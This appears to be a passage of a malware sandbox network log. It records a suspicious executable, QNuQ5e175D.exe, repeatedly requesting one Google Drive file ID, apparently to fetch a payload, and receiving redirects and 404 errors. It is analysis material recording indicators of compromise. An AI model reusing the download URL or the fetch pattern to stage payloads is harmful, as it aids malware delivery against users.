                                                      2025-01-11 04:06:07 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SivR66hkD7LlcIr4pvs6Og">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.11 | 49909 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:08 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:08 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:08 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-tl3kSo0rUTKe4bzGUR9mug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.11 | 49916 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:09 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:09 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQrxNivytgpzIfroY0Km0Oa-BzAOcmlbaiJ6dQpGvoHB-7qR2ZBjmn_jV5K9UWPgTJnpKoelQM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:09 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-S6Tnd-aNAsf65K3p4SIduw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:09 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Vr7yLgdms7eacECW935hqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.11 | 49926 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:10 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:10 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Hm3dRt2X4ZSbp7pNa2EIgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.11 | 49933 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:11 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:11 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQevJy5pKGLnkINqKLQFJTEPMiQDZdVwHbAHIDueYLep5wA6a4z1sJPHn2X-0Z8kSTz
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:11 GMT
                                                      Content-Security-Policy: script-src 'nonce-gQ62IfalAGZa63GOZV9y4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:11 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pZwfUoqEk0pF-o1X2l6pxg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.11 | 49943 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:12 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:13 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:12 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-NwbcgAi-ECTgEZvn6RWzHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      11          192.168.2.11  49950        142.250.184.225  443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:06:13 UTC  466                OUT        GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:14 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRLB1Bf6Wbp5FM0bH_v8mp-g6dua5NPQE_sGXKc_8m4rUKAOsBii_IU2X07oAyqs4wvYVFLwH0
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:13 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce--E3SRwmpsQuIeF1zFLz4Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:14 UTC  1652               IN
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ddfWqIdXk_oRc4cwLfN_Fw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      12          192.168.2.11  49959        172.217.16.142   443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:06:14 UTC  424                OUT        GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:15 UTC  1920               IN         HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:15 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Es92XkzhPgPMUc8hiVwieQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      13          192.168.2.11  49967        142.250.184.225  443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:06:15 UTC  466                OUT        GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:16 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC7JEAIPbmccGRSwlVWxNwGKC6XqexVsmKDyq-rgsnb_abHBlULabqVh6k3AmwR_RTrS
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:16 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-bUluizeK6fEkl6dlI3XOyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:16 UTC  1652               IN
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3G7AuqryFsKLdPRaYWjAKA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      14          192.168.2.11  49976        172.217.16.142   443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:06:17 UTC  424                OUT        GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:17 UTC  1920               IN         HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:17 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-kJ8lW33AbP6o1pPhEowUEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
